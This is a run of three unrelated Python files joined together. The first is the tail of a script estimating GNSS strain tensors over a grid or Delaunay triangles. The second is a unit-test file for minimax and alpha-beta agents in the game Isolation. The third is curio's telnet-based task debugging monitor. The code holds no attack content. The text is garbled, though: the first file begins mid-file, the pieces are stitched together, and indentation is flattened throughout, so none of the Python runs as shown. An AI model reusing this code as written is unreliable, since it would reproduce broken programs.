    ## TODO is this mean_lon optimal?? or should it be the region's mean longitude
##
mean_lon = degrees(sum([ x.lon for x in sta_list_ell ]) / len(sta_list_ell))
#utm_zone = floor(mean_lon/6)+31
#utm_zone = utm_zone + int(utm_zone<=0)*60 - int(utm_zone>60)*60
lcm = radians(floor(mean_lon))
#print('[DEBUG] Mean longtitude is {} deg.; using Zone = {} for UTM'.format(mean_lon, utm_zone))
sta_list_utm = deepcopy(sta_list_ell)
for idx, sta in enumerate(sta_list_utm):
N, E, Zone, lcm = ell2utm(sta.lat, sta.lon, Ellipsoid("wgs84"), lcm)
sta_list_utm[idx].lon = E
sta_list_utm[idx].lat = N
# assert Zone == utm_zone, "[ERROR] Invalid UTM Zone."
vprint('[DEBUG] Station list transformed to UTM.')
## Open file to write Strain Tensor estimates; write the header
fout = open(STRAIN_OUT_FILE, 'w')
vprint('[DEBUG] Strain info written in file: {}'.format(STRAIN_OUT_FILE))
print('{:^9s} {:^9s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s}'.format('Latitude', 'Longtitude', 'vx+dvx', 'vy+dvy', 'w+dw', 'exx+dexx', 'exy+dexy', 'eyy+deyy', 'emax+demax', 'emin+demin', 'shr+dshr', 'azi+dazi', 'dilat+ddilat', 'sec. invariant+dsec inv.'), file=fout)
print('{:^9s} {:^9s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s} {:^15s}'.format('deg', 'deg', 'mm/yr', 'mm/yr', 'deg/Myr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'nstrain/yr', 'deg.', 'nstrain/yr', 'nstrain/yr'), file=fout)
## Compute only one Strain Tensor, at the region's barycenter; then exit.
if args.one_tensor:
print('[DEBUG] Estimating Strain Tensor at region\'s barycentre.')
if args.method == 'shen':
sstr = ShenStrain(0e0, 0e0, False, sta_list_utm, **dargs)
else:
sstr = ShenStrain(0e0, 0e0, False, sta_list_utm, weighting_function='equal_weights')
sstr.set_to_barycenter()
sstr.estimate()
sstr.print_details(fout, utm_lcm)
fout.close()
write_station_info(sta_list_ell)
print('[DEBUG] Total running time: {:10.2f} sec.'.format((time.time() - start_time)))
sys.exit(0)
if args.method == 'shen': ## Going for Shen algorithm ...
## Construct the grid, in ellipsoidal coordinates --degrees--. If a region
##+ is not passed in, the grid.generate_grid will transform lon/lat pairs
##+ to degrees and produce a grid from extracting min/max crds from the
##+ station list.
if 'region' in args:
grd = pystrain.grid.Grid(lonmin, lonmax, args.x_grid_step, latmin, latmax, args.y_grid_step)
else:
grd = pystrain.grid.generate_grid(sta_list_ell, args.x_grid_step, args.y_grid_step, True)
print('[DEBUG] Grid Information:')
print('[DEBUG]\tLongtitude : from {} to {} with step {} (deg)'.format(grd.x_min, grd.x_max, grd.x_step))
print('[DEBUG]\tLatitude : from {} to {} with step {} (deg)'.format(grd.y_min, grd.y_max, grd.y_step))
print('[DEBUG] Number of Strain Tensors to be estimated: {}'.format(grd.xpts*grd.ypts))
if fstats:
print('{:^10s} {:^10s} {:^10s} {:^12s} {:^12s} {:^12s}'.format('Longtitude','Latitude','# stations', 'D (optimal)','CutOff dis.', 'Sigma'), file=fstats)
print('{:^10s} {:^10s} {:^10s} {:^12s} {:^12s} {:^12s}'.format('deg.','deg.','#', 'Km','#', '/'), file=fstats)
vprint('[DEBUG] Estimating strain tensor for each cell center:')
## Iterate through the grid (on each cell center). Grid returns cell-centre
##+ coordinates in lon/lat pairs, in degrees!
if args.multiproc_mode:
grd1, grd2, grd3, grd4 = grd.split2four()
print('--> grid split to four!')
fout1=open(".out.thread1", "w")
fout2=open(".out.thread2", "w")
fout3=open(".out.thread3", "w")
fout4=open(".out.thread4", "w")
if fstats:
fstats1=open(".sta.thread1", "w")
fstats2=open(".sta.thread2", "w")
fstats3=open(".sta.thread3", "w")
fstats4=open(".sta.thread4", "w")
else:
fstats1 = fstats2 = fstats3 = fstats4 = None
print('[DEBUG] Estimating strain tensors in multi-threading mode')
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd1.x_min, grd1.x_max, grd1.x_step, grd1.y_min, grd1.y_max, grd1.y_step))
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd2.x_min, grd2.x_max, grd2.x_step, grd2.y_min, grd2.y_max, grd2.y_step))
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd3.x_min, grd3.x_max, grd3.x_step, grd3.y_min, grd3.y_max, grd3.y_step))
#print('--> Thread will be given grid : X:{:}/{:}/{:} Y:{:}/{:}/{:}'.format(grd4.x_min, grd4.x_max, grd4.x_step, grd4.y_min, grd4.y_max, grd4.y_step))
p1 = multiprocessing.Process(target=compute__, args=(grd1, sta_list_utm, lcm, fout1, fstats1, vprint), kwargs=dargs)
p2 = multiprocessing.Process(target=compute__, args=(grd2, sta_list_utm, lcm, fout2, fstats2, vprint), kwargs=dargs)
p3 = multiprocessing.Process(target=compute__, args=(grd3, sta_list_utm, lcm, fout3, fstats3, vprint), kwargs=dargs)
p4 = multiprocessing.Process(target=compute__, args=(grd4, sta_list_utm, lcm, fout4, fstats4, vprint), kwargs=dargs)
[ p.start() for p in [p1, p2, p3, p4]]
[ p.join() for p in [p1, p2, p3, p4]]
for fl in [fout1, fout2, fout3, fout4]:
if not fl.closed:
fl.close()
if fstats:
for fl in [fstats1, fstats2, fstats3, fstats4]:
if not fl.closed:
fl.close()
## Note that fout? and fstats? are now closed! We need to
##+ concatenate the files though.
with open(STRAIN_OUT_FILE, 'a') as fout:
for fnr in range(1,5):
with open(".out.thread"+str(fnr), "r") as slave_f:
fout.write(slave_f.read())
os.remove(".out.thread"+str(fnr))
if fstats:
with open(STATISTICS_FILE, 'a') as fstats:
for fnr in range(1,5):
with open(".sta.thread"+str(fnr), "r") as slave_f:
fstats.write(slave_f.read())
os.remove(".sta.thread"+str(fnr))
else:
compute__(grd, sta_list_utm, lcm, fout, fstats, vprint, **dargs)
else:
## Using veis method. Compute delaunay triangles and estimate one tensor
##+ per triangle centre
## Open file to write delaunay triangles.
print('[DEBUG] Estimating Strain Tensors at the barycentre of Delaunay triangles')
dlnout = open('delaunay_info.dat', 'w')
points = numpy.array([ [sta.lon, sta.lat] for sta in sta_list_utm ])
tri = Delaunay(points)
print('[DEBUG] Number of Delaunay triangles: {}'.format(len(tri.simplices)))
for idx, trng in enumerate(tri.simplices):
print('[DEBUG] {:5d}/{:7d}'.format(idx+1, len(tri.simplices)), end="\r")
## triangle barycentre
cx = (sta_list_utm[trng[0]].lon + sta_list_utm[trng[1]].lon + sta_list_utm[trng[2]].lon)/3e0
cy = (sta_list_utm[trng[0]].lat + sta_list_utm[trng[1]].lat + sta_list_utm[trng[2]].lat)/3e0
## Construct a strain instance, at the triangle's barycentre, with only
##+ 3 points (in UTM) and equal_weights weighting scheme.
sstr = ShenStrain(cx, cy, cy<0e0, [sta_list_utm[trng[0]], sta_list_utm[trng[1]], sta_list_utm[trng[2]]], weighting_function='equal_weights')
sstr.estimate()
sstr.print_details(fout, lcm)
## Print the triangle in the corresponding file (ellipsoidal crd, degrees)
print('> {:}, {:}, {:}'.format(sta_list_utm[trng[0]].name, sta_list_utm[trng[1]].name, sta_list_utm[trng[2]].name), file=dlnout)
print('{:+8.5f} {:8.5f}\n{:+8.5f} {:8.5f}\n{:+8.5f} {:8.5f}\n{:+8.5f} {:8.5f}'.format(*[ degrees(x) for x in [sta_list_ell[trng[0]].lon, sta_list_ell[trng[0]].lat, sta_list_ell[trng[1]].lon, sta_list_ell[trng[1]].lat, sta_list_ell[trng[2]].lon, sta_list_ell[trng[2]].lat, sta_list_ell[trng[0]].lon, sta_list_ell[trng[0]].lat]]), file=dlnout)
dlnout.close()
fout.close()
## Before exiting, write the station information to a file
write_station_info(sta_list_ell)
print('[DEBUG] Total running time: {:10.2f} sec.'.format((time.time() - start_time)))
agent_test.py
"""This file is provided as a starting template for writing your own unit
tests to run and debug your minimax and alphabeta agents locally. The test
cases used by the project assistant are not public.
"""
import random
import unittest
import timeit
import sys
import isolation
import game_agent
from collections import Counter
from copy import deepcopy
from copy import copy
from functools import wraps
from queue import Queue
from threading import Thread
from multiprocessing import TimeoutError
from queue import Empty as QueueEmptyError
from importlib import reload
from game_agent import (MinimaxPlayer, AlphaBetaPlayer, custom_score,
custom_score_2, custom_score_3, aggressive_heuristic)
WRONG_MOVE = """
The {} function failed because it returned a non-optimal move at search depth {}.
Valid choices: {}
Your selection: {}
"""
WRONG_NUM_EXPLORED = """
Your {} search visited the wrong nodes at search depth {}. If the number
of visits is too large, make sure that iterative deepening is only
running when the `iterative` flag is set in the agent constructor.
Max explored size: {}
Number you explored: {}
"""
UNEXPECTED_VISIT = """
Your {} search did not visit the number of expected unique nodes at search
depth {}.
Max explored size: {}
Number you explored: {}
"""
ID_FAIL = """
Your agent explored the wrong number of nodes using Iterative Deepening and
minimax. Remember that ID + MM should check every node in each layer of the
game tree before moving on to the next layer.
"""
INVALID_MOVE = """
Your agent returned an invalid move. Make sure that your function returns
a selection when the search times out during iterative deepening.
Valid choices: {!s}
Your choice: {}
"""
TIMER_MARGIN = 15 # time (in ms) to leave on the timer to avoid timeout
def curr_time_millis():
"""Simple timer to return the current clock time in milliseconds."""
return 1000 * timeit.default_timer()
def handler(obj, testcase, queue):
"""Handler to pass information between threads; used in the timeout
function to abort long-running (i.e., probably hung) test cases.
"""
try:
queue.put((None, testcase(obj)))
except:
queue.put((sys.exc_info(), None))
def timeout(time_limit):
"""Function decorator for unittest test cases to specify test case timeout.
The timer mechanism works by spawning a new thread for the test to run in
and using the timeout handler for the thread-safe queue class to abort and
kill the child thread if it doesn't return within the timeout.
It is not safe to access system resources (e.g., files) within test cases
wrapped by this timer.
"""
def wrapUnitTest(testcase):
@wraps(testcase)
def testWrapper(self):
queue = Queue()
try:
p = Thread(target=handler, args=(self, testcase, queue))
p.daemon = True
p.start()
err, res = queue.get(timeout=time_limit)
p.join()
if err:
raise err[0](err[1]).with_traceback(err[2])
return res
except QueueEmptyError:
raise TimeoutError("Test aborted due to timeout. Test was " +
"expected to finish in less than {} second(s).".format(time_limit))
return testWrapper
return wrapUnitTest
def makeEvalTable(table):
"""Use a closure to create a heuristic function that returns values from
a table that maps board locations to constant values. This supports testing
the minimax and alphabeta search functions.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
row, col = game.get_player_location(player)
return table[row][col]
return score
def makeEvalStop(limit, timer, value=None):
"""Use a closure to create a heuristic function that forces the search
    timer to expire when a fixed number of node expansions have been performed
during the search. This ensures that the search algorithm should always be
in a predictable state regardless of node expansion order.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if timer.time_left() < 0:
raise TimeoutError("Timer expired during search. You must " +
"return an answer before the timer reaches 0.")
if limit == game.counts[0]:
timer.time_limit = 0
return 0
return score
def makeBranchEval(first_branch):
"""Use a closure to create a heuristic function that evaluates to a nonzero
score when the root of the search is the first branch explored, and
otherwise returns 0. This heuristic is used to force alpha-beta to prune
some parts of a game tree for testing.
THIS HEURISTIC IS ONLY USEFUL FOR TESTING THE SEARCH FUNCTIONALITY -
IT IS NOT MEANT AS AN EXAMPLE OF A USEFUL HEURISTIC FOR GAME PLAYING.
"""
def score(game, player):
if not first_branch:
first_branch.append(game.root)
if game.root in first_branch:
return 1.
return 0.
return score
class CounterBoard(isolation.Board):
"""Subclass of the isolation board that maintains counters for the number
of unique nodes and total nodes visited during depth first search.
Some functions from the base class must be overridden to maintain the
counters during search.
"""
def __init__(self, *args, **kwargs):
super(CounterBoard, self).__init__(*args, **kwargs)
self.counter = Counter()
self.visited = set()
self.root = None
def copy(self):
new_board = CounterBoard(self._player_1, self._player_2, width=self.width, height=self.height)
new_board.move_count = self.move_count
new_board._active_player = self._active_player
new_board._inactive_player = self._inactive_player
new_board._board_state = deepcopy(self._board_state)
new_board.counter = self.counter
new_board.visited = self.visited
new_board.root = self.root
return new_board
def forecast_move(self, move):
self.counter[move] += 1
self.visited.add(move)
new_board = self.copy()
new_board.apply_move(move)
if new_board.root is None:
new_board.root = move
return new_board
@property
def counts(self):
""" Return counts of (total, unique) nodes visited """
return sum(self.counter.values()), len(self.visited)
class Project1Test(unittest.TestCase):
def initAUT_MinimaxPlayer(self, depth, eval_fn, loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.MinimaxPlayer(depth, eval_fn)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
def initAUT_AlphaBetaPlayer(self, depth, eval_fn, loc1=(3, 3), loc2=(0, 0), w=7, h=7):
"""Generate and initialize player and board objects to be used for
testing.
"""
reload(game_agent)
agentUT = game_agent.AlphaBetaPlayer(depth, eval_fn)
board = CounterBoard(agentUT, 'null_agent', w, h)
board.apply_move(loc1)
board.apply_move(loc2)
return agentUT, board
@timeout(5)
# @unittest.skip("Skip eval function test.") # Uncomment this line to skip test
def test_heuristic(self):
""" Test output interface of heuristic score function interface."""
player1 = "Player1"
player2 = "Player2"
p1_location = (0, 0)
        p2_location = (1, 1)  # near the top left corner
game = isolation.Board(player1, player2)
game.apply_move(p1_location)
game.apply_move(p2_location)
self.assertIsInstance(game_agent.custom_score(game, player1), float, "The heuristic function should return a floating point")
@timeout(5)
# @unittest.skip("Skip simple minimax test.") # Uncomment this line to skip test
def test_minimax_interface(self):
""" Test MinimaxPlayer interface with simple input """
h, w = 7, 7 # board size
test_depth = 1
starting_location = (5, 3)
adversary_location = (0, 0) # top left corner
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.MinimaxPlayer(test_depth, heuristic)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
best_move = agentUT.minimax(next_state, test_depth)
            self.assertTrue(type(best_move) == tuple,
                            ("Minimax function should return a tuple of " +
                             "board coordinates for the best move found in " +
                             "the branch being searched."))
@timeout(5)
# @unittest.skip("Skip alphabeta test.") # Uncomment this line to skip test
def test_alphabeta_interface(self):
""" Test AlphaBetaPlayer interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.AlphaBetaPlayer(test_depth, heuristic)
agentUT.time_left = lambda: 99 # ignore timeout for fixed-depth search
board = isolation.Board(agentUT, 'null_agent', w, h)
# place two "players" on the board at arbitrary (but fixed) locations
board.apply_move(starting_location)
board.apply_move(adversary_location)
for move in board.get_legal_moves():
next_state = board.forecast_move(move)
best_move = agentUT.alphabeta(next_state, test_depth)
            self.assertTrue(type(best_move) == tuple,
                            ("Alpha Beta function should return a tuple of " +
                             "board coordinates for the best move found in " +
                             "the branch being searched."))
@timeout(5)
# @unittest.skip("Skip get_move test.") # Uncomment this line to skip test
def test_get_move_interface(self):
""" Test MinimaxPlayer.get_move interface with simple input """
h, w = 9, 9 # board size
test_depth = 1
starting_location = (2, 7)
adversary_location = (0, 0) # top left corner
heuristic = lambda g, p: 0. # return 0 everywhere
# create a player agent & a game board
agentUT = game_agent.MinimaxPlayer(test_depth, heuristic)
# Test that get_move returns a legal choice on an empty game board
board = isolation.Board(agentUT, 'null_agent', w, h)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on an " +
"empty board. It should return coordinates on the " +
"game board for the location of the agent's next " +
"move. The move must be one of the legal moves on " +
"the current game board."))
# Test that get_move returns a legal choice for first move as player 2
board = isolation.Board('null_agent', agentUT, w, h)
board.apply_move(starting_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed making the first " +
"move as player 2 on a new board. It should return " +
"coordinates on the game board for the location " +
"of the agent's next move. The move must be one " +
"of the legal moves on the current game board."))
# Test that get_move returns a legal choice after first move
board = isolation.Board(agentUT, 'null_agent', w, h)
board.apply_move(starting_location)
board.apply_move(adversary_location)
legal_moves = board.get_legal_moves()
move = agentUT.get_move(board, lambda: 99)
self.assertIn(move, legal_moves,
("The get_move() function failed as player 1 on a " +
"game in progress. It should return coordinates on" +
"the game board for the location of the agent's " +
"next move. The move must be one of the legal moves " +
"on the current game board."))
@timeout(5)
# @unittest.skip("Skip minimax test.") # Uncomment this line to skip test
def test_minimax(self):
""" Test MinimaxPlayer
This test uses a scoring function that returns a constant value based
on the location of the search agent on the board to force minimax to
choose a branch that visits those cells at a specific fixed-depth.
If minimax is working properly, it will visit a constant number of
nodes during the search and return one of the acceptable legal moves.
"""
h, w = 7, 7 # board size
starting_location = (2, 3)
adversary_location = (0, 0) # top left corner
method = "minimax"
# The agent under test starts at position (2, 3) on the board, which
# gives eight (8) possible legal moves [(0, 2), (0, 4), (1, 1), (1, 5),
# (3, 1), (3, 5), (4, 2), (4, 4)]. The search function will pick one of
# those moves based on the estimated score for each branch. The value
# only changes on odd depths because even depths end on when the
# adversary has initiative.
value_table = [[0] * w for _ in range(h)]
value_table[1][5] = 1 # depth 1 & 2
value_table[4][3] = 2 # depth 3 & 4
value_table[6][6] = 3 # depth 5
heuristic = makeEvalTable(value_table)
# These moves are the branches that will lead to the cells in the value
# table for the search depths.
expected_moves = [set([(1, 5)]),
set([(3, 1), (3, 5)]),
set([(3, 5), (4, 2)])]
# Expected number of node expansions during search
counts = [(8, 8), (24, 10), (92, 27), (418, 32), (1650, 43)]
# Test fixed-depth search; note that odd depths mean that the searching
# player (student agent) has the last move, while even depths mean that
# the adversary has the last move before calling the heuristic
# evaluation function.
for idx in range(5):
test_depth = idx + 1
agentUT, board = self.initAUT_MinimaxPlayer(test_depth, heuristic,
loc1=starting_location,
loc2=adversary_location)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
move = agentUT.minimax(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, expected_moves[idx // 2], WRONG_MOVE.format(
method, test_depth, expected_moves[idx // 2], move))
@timeout(20)
# @unittest.skip("Skip alpha-beta test.") # Uncomment this line to skip test
def test_alphabeta(self):
""" Test AlphaBetaPlayer
This test uses a scoring function that returns a constant value based
on the branch being searched by alphabeta in the user agent, and forces
the search to prune on every other branch it visits. By using a huge
board where the players are too far apart to interact and every branch
has the same growth factor, the expansion and pruning must result in
an exact number of expanded nodes.
"""
h, w = 101, 101 # board size
starting_location = (50, 50)
adversary_location = (0, 0) # top left corner
iterative_search = False
method = "alphabeta"
# The agent under test starts in the middle of a huge board so that
# every branch has the same number of possible moves, so pruning any
# branch has the same effect during testing
# These are the expected number of node expansions for alphabeta search
# to explore the game tree to fixed depth. The custom eval function
# used for this test ensures that some branches must be pruned, while
# the search should still return an optimal move.
counts = [(8, 8), (17, 10), (74, 42), (139, 51), (540, 119)]
for idx in range(len(counts)):
test_depth = idx + 1 # pruning guarantee requires min depth of 3
first_branch = []
heuristic = makeBranchEval(first_branch)
agentUT, board = self.initAUT_AlphaBetaPlayer(test_depth, heuristic,
loc1=starting_location,
loc2=adversary_location,
w=w, h=h)
# disable search timeout by returning a constant value
agentUT.time_left = lambda: 1e3
move = agentUT.alphabeta(board, test_depth)
num_explored_valid = board.counts[0] == counts[idx][0]
num_unique_valid = board.counts[1] == counts[idx][1]
self.assertTrue(num_explored_valid, WRONG_NUM_EXPLORED.format(
method, test_depth, counts[idx][0], board.counts[0]))
self.assertTrue(num_unique_valid, UNEXPECTED_VISIT.format(
method, test_depth, counts[idx][1], board.counts[1]))
self.assertIn(move, first_branch, WRONG_MOVE.format(
method, test_depth, first_branch, move))
@timeout(20)
#@unittest.skip("Skip iterative deepening test.") # Uncomment this line to skip test
def test_get_move(self):
""" Test iterative deepening in MinimaxPlayer.get_move by placing an
agent on the game board and performing ID minimax search, which
should visit a specific number of unique nodes while expanding. By
forcing the search to timeout when a predetermined number of nodes
have been expanded, we can then verify that the expected number of
unique nodes have been visited.
"""
class DynamicTimer():
"""Dynamic Timer allows the time limit to be changed after the
timer is initialized so that the search timeout can be triggered
before the timer actually expires. This allows the timer to expire
when an event occurs, regardless of the clock time required until
the event happens.
"""
def __init__(self, time_limit):
self.time_limit = time_limit
self.start_time = curr_time_millis()
def time_left(self):
return self.time_limit - (curr_time_millis() - self.start_time)
w, h = 11, 11 # board size
adversary_location = (0, 0)
method = "minimax"
# The agent under test starts at the positions indicated below, and
# performs an iterative deepening minimax search (minimax is easier to
# test because it always visits all nodes in the game tree at every
# level).
origins = [(2, 3), (6, 6), (7, 4), (4, 2), (0, 5), (10, 10)]
#exact_counts = [(8, 8), (32, 10), (160, 39), (603, 35), (1861, 54), (3912, 62)]
exact_counts = [(8, 8), (24, 10), (128, 39), (467, 35), (1509, 54), (3126, 62)]
for idx in range(len(origins)):
# set the initial timer high enough that the search will not
# timeout before triggering the dynamic timer to halt by visiting
# the expected number of nodes
test_depth = idx + 1
time_limit = 1e4
timer = DynamicTimer(time_limit)
eval_fn = makeEvalStop(exact_counts[idx][0], timer, time_limit)
agentUT, board = self.initAUT_MinimaxPlayer(test_depth, eval_fn,
origins[idx], adversary_location,
w, h)
legal_moves = board.get_legal_moves()
chosen_move = agentUT.get_move(board, timer.time_left)
diff_total = abs(board.counts[0] - exact_counts[idx][0])
diff_unique = abs(board.counts[1] - exact_counts[idx][1])
self.assertTrue(diff_total <= 1 and diff_unique == 0, ID_FAIL)
self.assertTrue(chosen_move in legal_moves, INVALID_MOVE.format(legal_moves, chosen_move))
class IsolationTest(unittest.TestCase):
"""Unit tests for isolation agents"""
def setUp(self):
reload(game_agent)
self.player1 = "Player1"
self.player2 = "Player2"
self.game = isolation.Board(self.player1, self.player2)
if __name__ == '__main__':
unittest.main()
|
monitor.py
|
# curio/monitor.py
#
# Debugging monitor for curio. To enable the monitor, create a kernel
# and then attach a monitor to it, like this:
#
# k = Kernel()
# mon = Monitor(k)
# k.run(mon.start())
#
# If using the run() function, you can do this:
#
# run(coro, with_monitor=True)
#
# run() also looks for the CURIOMONITOR environment variable
#
# env CURIOMONITOR=TRUE python3 someprog.py
#
# If you need to change some aspect of the monitor configuration, you
# can do manual setup:
#
# k = Kernel()
# mon = Monitor(k, host, port)
# k.run(mon)
#
# Where host and port configure the network address on which the monitor
# operates.
#
# To connect to the monitor, run python3 -m curio.monitor -H [host] -p [port].
# For example, with the default host and port:
#
#      python3 -m curio.monitor -H 127.0.0.1 -p 48802
#
# Theory of operation:
# --------------------
# The monitor works by opening up a loopback socket on the local
# machine and allowing connections via telnet. By default, it only
# allows a connection originating from the local machine. Only a
# single monitor connection is allowed at any given time.
#
# There are two parts to the monitor itself: a user interface and an
# internal loop that runs on curio itself. The user interface part
# runs in a completely separate execution thread. The reason for this
# is that it allows curio to be monitored even if the curio kernel is
# completely deadlocked, occupied with a large CPU-bound task, or
# otherwise hosed in some way. At a minimum, you can connect,
# look at the task table, and see what the tasks are doing.
#
# The internal monitor loop implemented on curio itself is presently
# used to implement external task cancellation. Manipulating any part
# of the kernel state or task status is unsafe from an outside thread.
# To make it safe, the user-interface thread of the monitor hands over
# requests requiring the involvement of the kernel to the monitor
# loop. Since this loop runs on curio, it can safely make
# cancellation requests and perform other kernel-related actions.
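#
# A minimal sketch (not taken from the curio docs; names here are purely
# illustrative) of that hand-off pattern: a plain thread submits work via a
# UniversalQueue and a curio task consumes it, so all kernel interaction
# stays inside curio.
#
#     import threading
#     from curio import run, spawn, UniversalQueue
#
#     async def consumer(q):
#         while True:
#             item = await q.get()
#             if item is None:        # sentinel used by this sketch to stop
#                 break
#             print('handled', item)
#
#     def producer(q):
#         for i in range(3):
#             q.put(i)                # synchronous put() from a plain thread
#         q.put(None)
#
#     async def main():
#         q = UniversalQueue()
#         task = await spawn(consumer, q)
#         threading.Thread(target=producer, args=(q,)).start()
#         await task.join()
#
#     run(main)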
import os
import signal
import time
import socket
import threading
import telnetlib
import argparse
import logging
# --- Curio
from .task import Task, spawn
from . import queue
# ---
log = logging.getLogger(__name__)
MONITOR_HOST = '127.0.0.1'
MONITOR_PORT = 48802
class Monitor(object):
'''
Task monitor that runs concurrently to the curio kernel in a
separate thread. This can watch the kernel and provide debugging.
'''
def __init__(self, kern, host=MONITOR_HOST, port=MONITOR_PORT):
self.kernel = kern
self.address = (host, port)
self.monitor_queue = queue.UniversalQueue()
self._closing = None
self._ui_thread = None
def close(self):
if self._closing:
self._closing.set()
if self._ui_thread:
self._ui_thread.join()
async def monitor_task(self):
'''
Asynchronous task loop for carrying out task cancellation.
'''
while True:
task = await self.monitor_queue.get()
await task.cancel()
async def start(self):
'''
Function to start the monitor
'''
# The monitor launches both a separate thread and helper task
# that runs inside curio itself to manage cancellation events
log.info('Starting Curio monitor at %s', self.address)
self._ui_thread = threading.Thread(target=self.server, args=(), daemon=True)
self._closing = threading.Event()
self._ui_thread.start()
await spawn(self.monitor_task, daemon=True)
return
def server(self):
'''
Synchronous kernel for the monitor. This runs in a separate thread
from curio itself.
'''
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# set the timeout to prevent the server loop from
        # blocking indefinitely on sock.accept()
sock.settimeout(0.5)
sock.bind(self.address)
sock.listen(1)
with sock:
while not self._closing.is_set():
try:
client, addr = sock.accept()
with client:
client.settimeout(0.5)
# This bit of magic is for reading lines of input while still allowing timeouts
# and the ability for the monitor to die when curio exits. See Issue #108.
def readlines():
buffer = bytearray()
while not self._closing.is_set():
index = buffer.find(b'\n')
if index >= 0:
line = buffer[:index + 1].decode('latin-1')
del buffer[:index + 1]
yield line
try:
chunk = client.recv(1000)
if not chunk:
break
buffer.extend(chunk)
except socket.timeout:
pass
sout = client.makefile('w', encoding='latin-1')
self.interactive_loop(sout, readlines())
except socket.timeout:
continue
def interactive_loop(self, sout, input_lines):
'''
Main interactive loop of the monitor
'''
sout.write('\nCurio Monitor: %d tasks running\n' % len(self.kernel._tasks))
sout.write('Type help for commands\n')
while True:
sout.write('curio > ')
sout.flush()
resp = next(input_lines, None)
if not resp:
return
try:
if resp.startswith('q'):
self.command_exit(sout)
return
elif resp.startswith('pa'):
_, taskid_s = resp.split()
self.command_parents(sout, int(taskid_s))
elif resp.startswith('p'):
self.command_ps(sout)
elif resp.startswith('exit'):
self.command_exit(sout)
return
elif resp.startswith('cancel'):
_, taskid_s = resp.split()
self.command_cancel(sout, int(taskid_s))
elif resp.startswith('signal'):
_, signame = resp.split()
self.command_signal(sout, signame)
elif resp.startswith('w'):
_, taskid_s = resp.split()
self.command_where(sout, int(taskid_s))
elif resp.startswith('h'):
self.command_help(sout)
else:
sout.write('Unknown command. Type help.\n')
except Exception as e:
sout.write('Bad command. %s\n' % e)
def command_help(self, sout):
sout.write(
'''Commands:
ps : Show task table
where taskid : Show stack frames for a task
cancel taskid : Cancel an indicated task
signal signame : Send a Unix signal
parents taskid : List task parents
quit : Leave the monitor
''')
def command_ps(self, sout):
headers = ('Task', 'State', 'Cycles', 'Timeout', 'Sleep', 'Task')
widths = (6, 12, 10, 7, 7, 50)
for h, w in zip(headers, widths):
sout.write('%-*s ' % (w, h))
sout.write('\n')
sout.write(' '.join(w * '-' for w in widths))
sout.write('\n')
timestamp = time.monotonic()
for taskid in sorted(self.kernel._tasks):
task = self.kernel._tasks.get(taskid)
if task:
timeout_remaining = format(
(task.timeout - timestamp),
'0.6f')[:7] if task.timeout else 'None'
sleep_remaining = format(
(task.sleep - timestamp),
'0.6f')[:7] if task.sleep else 'None'
sout.write('%-*d %-*s %-*d %-*s %-*s %-*s\n' % (widths[0], taskid,
widths[1], task.state,
widths[2], task.cycles,
widths[3], timeout_remaining,
widths[4], sleep_remaining,
widths[5], task.name))
def command_where(self, sout, taskid):
task = self.kernel._tasks.get(taskid)
if task:
sout.write(task.traceback() + '\n')
else:
sout.write('No task %d\n' % taskid)
def command_signal(self, sout, signame):
if hasattr(signal, signame):
os.kill(os.getpid(), getattr(signal, signame))
else:
sout.write('Unknown signal %s\n' % signame)
def command_cancel(self, sout, taskid):
task = self.kernel._tasks.get(taskid)
if task:
sout.write('Cancelling task %d\n' % taskid)
self.monitor_queue.put(task)
def command_parents(self, sout, taskid):
while taskid:
task = self.kernel._tasks.get(taskid)
if task:
sout.write('%-6d %12s %s\n' % (task.id, task.state, task.name))
taskid = task.parentid
else:
break
def command_exit(self, sout):
sout.write('Leaving monitor. Hit Ctrl-C to exit\n')
sout.flush()
def monitor_client(host, port):
'''
Client to connect to the monitor via "telnet"
'''
tn = telnetlib.Telnet()
tn.open(host, port, timeout=0.5)
try:
tn.interact()
except KeyboardInterrupt:
pass
